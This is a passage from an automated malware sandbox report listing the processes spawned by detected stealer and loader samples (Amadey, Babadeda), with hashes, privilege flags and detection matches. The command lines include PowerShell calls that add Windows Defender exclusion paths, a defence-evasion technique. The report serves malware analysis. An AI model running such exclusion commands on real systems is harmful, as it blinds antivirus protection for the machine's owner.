                                                                                                                                                                                                                                                    Imagebase:0xf50000
                                                                                                                                                                                                                                                    File size:3'220'480 bytes
                                                                                                                                                                                                                                                    MD5 hash:69E09CBF7B56454D9FF5686CD8FE492F
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                    Target ID:19
                                                                                                                                                                                                                                                    Start time:09:43:10
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe"
                                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                                    File size:93'696 bytes
                                                                                                                                                                                                                                                    MD5 hash:C821E7D7DAC978E7D5E8F35B0FE2AF88
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                                                    • Rule: JoeSecurity_Babadeda, Description: Yara detected Babadeda, Source: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe, Author: Joe Security
                                                                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                                                                    • Detection: 57%, ReversingLabs
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                    Target ID:20
                                                                                                                                                                                                                                                    Start time:09:43:10
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                    Imagebase:0x7ff68cce0000
                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                    Target ID:21
                                                                                                                                                                                                                                                    Start time:09:43:10
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:"C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\C0C9.tmp\C0CA.tmp\C0CB.bat C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe"
                                                                                                                                                                                                                                                    Imagebase:0x7ff7ac430000
                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                    Target ID:22
                                                                                                                                                                                                                                                    Start time:09:43:10
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:"C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe" any_word
                                                                                                                                                                                                                                                    Imagebase:0x7ff7ac430000
                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                    Target ID:23
                                                                                                                                                                                                                                                    Start time:09:43:10
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                    Imagebase:0x7ff68cce0000
                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                    Target ID:24
                                                                                                                                                                                                                                                    Start time:09:43:10
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe any_word
                                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                                    File size:93'696 bytes
                                                                                                                                                                                                                                                    MD5 hash:C821E7D7DAC978E7D5E8F35B0FE2AF88
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                    Target ID:25
                                                                                                                                                                                                                                                    Start time:09:43:10
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:"C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\C1B3.tmp\C1B4.tmp\C1B5.bat C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe any_word"
                                                                                                                                                                                                                                                    Imagebase:0x7ff7ac430000
                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                    Target ID:26
                                                                                                                                                                                                                                                    Start time:09:43:11
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\Documents\HJEHIJEBKE.exe"
                                                                                                                                                                                                                                                    Imagebase:0xc30000
                                                                                                                                                                                                                                                    File size:236'544 bytes
                                                                                                                                                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                    Target ID:27
                                                                                                                                                                                                                                                    Start time:09:43:11
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                    Imagebase:0x7ff68cce0000
                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                    Target ID:28
                                                                                                                                                                                                                                                    Start time:09:43:11
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Users\user\Documents\HJEHIJEBKE.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:"C:\Users\user\Documents\HJEHIJEBKE.exe"
                                                                                                                                                                                                                                                    Imagebase:0x6c0000
                                                                                                                                                                                                                                                    File size:3'220'480 bytes
                                                                                                                                                                                                                                                    MD5 hash:69E09CBF7B56454D9FF5686CD8FE492F
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001C.00000002.2272143312.00000000006C1000.00000040.00000001.01000000.00000010.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                    Target ID:29
                                                                                                                                                                                                                                                    Start time:09:43:13
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe"
                                                                                                                                                                                                                                                    Imagebase:0xc30000
                                                                                                                                                                                                                                                    File size:15'360 bytes
                                                                                                                                                                                                                                                    MD5 hash:9BE5AC720DCF1838FD5A2D7352672F66
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                                                                    • Detection: 30%, ReversingLabs
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                    Target ID:30
                                                                                                                                                                                                                                                    Start time:09:43:13
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                    Imagebase:0x7ff68cce0000
                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                    Target ID:31
                                                                                                                                                                                                                                                    Start time:09:43:15
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:"powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\wOXcVegx'
                                                                                                                                                                                                                                                    Imagebase:0x1d0000
                                                                                                                                                                                                                                                    File size:433'152 bytes
                                                                                                                                                                                                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                    Target ID:32
                                                                                                                                                                                                                                                    Start time:09:43:15
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                    Imagebase:0x7ff68cce0000
                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                    Target ID:34
                                                                                                                                                                                                                                                    Start time:09:43:18
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exe"
                                                                                                                                                                                                                                                    Imagebase:0x9e0000
                                                                                                                                                                                                                                                    File size:540'672 bytes
                                                                                                                                                                                                                                                    MD5 hash:9AB250B0DC1D156E2D123D277EB4D132
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                                                                    • Detection: 95%, ReversingLabs
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                    Target ID:35
                                                                                                                                                                                                                                                    Start time:09:43:18
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                    Imagebase:0x7ff68cce0000
                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                    Target ID:36
                                                                                                                                                                                                                                                    Start time:09:43:19
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exe"
                                                                                                                                                                                                                                                    Imagebase:0x9e0000
                                                                                                                                                                                                                                                    File size:540'672 bytes
                                                                                                                                                                                                                                                    MD5 hash:9AB250B0DC1D156E2D123D277EB4D132
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000024.00000003.2395728481.0000000001508000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000024.00000003.2424648787.0000000001509000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000024.00000003.2389530571.0000000001504000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                    Target ID:37
                                                                                                                                                                                                                                                    Start time:09:43:20
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:"powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\Users'
                                                                                                                                                                                                                                                    Imagebase:0x1d0000
                                                                                                                                                                                                                                                    File size:433'152 bytes
                                                                                                                                                                                                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                    Target ID:38
                                                                                                                                                                                                                                                    Start time:09:43:20
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                    Imagebase:0x7ff68cce0000
                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                    Target ID:39
                                                                                                                                                                                                                                                    Start time:09:43:24
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe"
                                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                                    File size:93'696 bytes
                                                                                                                                                                                                                                                    MD5 hash:C821E7D7DAC978E7D5E8F35B0FE2AF88
                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                    Target ID:40
                                                                                                                                                                                                                                                    Start time:09:43:24
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                    Imagebase:0x7ff68cce0000
                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                    Target ID:41
                                                                                                                                                                                                                                                    Start time:09:43:24
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:"C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\F7C7.tmp\F7C8.tmp\F7C9.bat C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe"
                                                                                                                                                                                                                                                    Imagebase:0x7ff7ac430000
                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                    Target ID:42
                                                                                                                                                                                                                                                    Start time:09:43:24
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:"C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe" any_word
                                                                                                                                                                                                                                                    Imagebase:0x7ff7ac430000
                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                    Target ID:43
                                                                                                                                                                                                                                                    Start time:09:43:24
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                    Imagebase:0x7ff68cce0000
                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                    Target ID:44
                                                                                                                                                                                                                                                    Start time:09:43:24
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe any_word
                                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                                    File size:93'696 bytes
                                                                                                                                                                                                                                                    MD5 hash:C821E7D7DAC978E7D5E8F35B0FE2AF88
                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                    Target ID:45
                                                                                                                                                                                                                                                    Start time:09:43:24
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:"C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\F9BB.tmp\F9BC.tmp\F9BD.bat C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe any_word"
                                                                                                                                                                                                                                                    Imagebase:0x7ff7ac430000
                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                    Target ID:46
                                                                                                                                                                                                                                                    Start time:09:43:24
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                                                                                                                                                                                                                                    Imagebase:0x7ff7ac430000
                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                    Target ID:47
                                                                                                                                                                                                                                                    Start time:09:43:24
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exe"
                                                                                                                                                                                                                                                    Imagebase:0xd10000
                                                                                                                                                                                                                                                    File size:2'668'544 bytes
                                                                                                                                                                                                                                                    MD5 hash:87330F1877C33A5A6203C49075223B16
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002F.00000003.4825063904.00000000009F1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002F.00000003.4847583445.00000000009A1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002F.00000003.4847052772.00000000009FB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002F.00000003.4847277082.000000000098A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002F.00000003.4822742633.00000000009F1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002F.00000003.4859195796.000000000098C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002F.00000003.4793714186.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002F.00000003.4809448660.00000000009E6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002F.00000003.4839076597.00000000009F1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                                                                    • Detection: 48%, ReversingLabs
                                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                    Target ID:48
                                                                                                                                                                                                                                                    Start time:09:43:24
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
